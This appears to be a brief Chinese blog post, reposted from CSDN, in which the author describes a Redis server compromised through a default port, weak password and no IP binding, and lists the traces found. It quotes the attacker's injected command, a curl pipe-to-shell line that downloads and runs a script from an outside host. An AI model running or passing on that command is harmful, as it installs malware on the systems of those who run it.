redis被攻击

发布时间:2024年01月08日

之前由于redis没有修改端口,密码也比较简单,也没有绑定ip 结果被攻击了

1 redis里被写入string类型的脚本,比如:Back1 Back2 Back3 Back4 ,内容curl -fsSL http://d.powerofwish.com/pm.sh | sh的形式,如下图:

这个pm.sh脚本被放在被上传工具文件里

2 /www/server/redis下多了一个root文件 具体文件放在被上传工具文件里

3 去把主库的rdb文件和aof文件删下防止用这个数据恢复。

我的在appendonly.aof文件里看到了以下命令

文章来源:https://blog.csdn.net/nihao123456789222/article/details/135449533
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。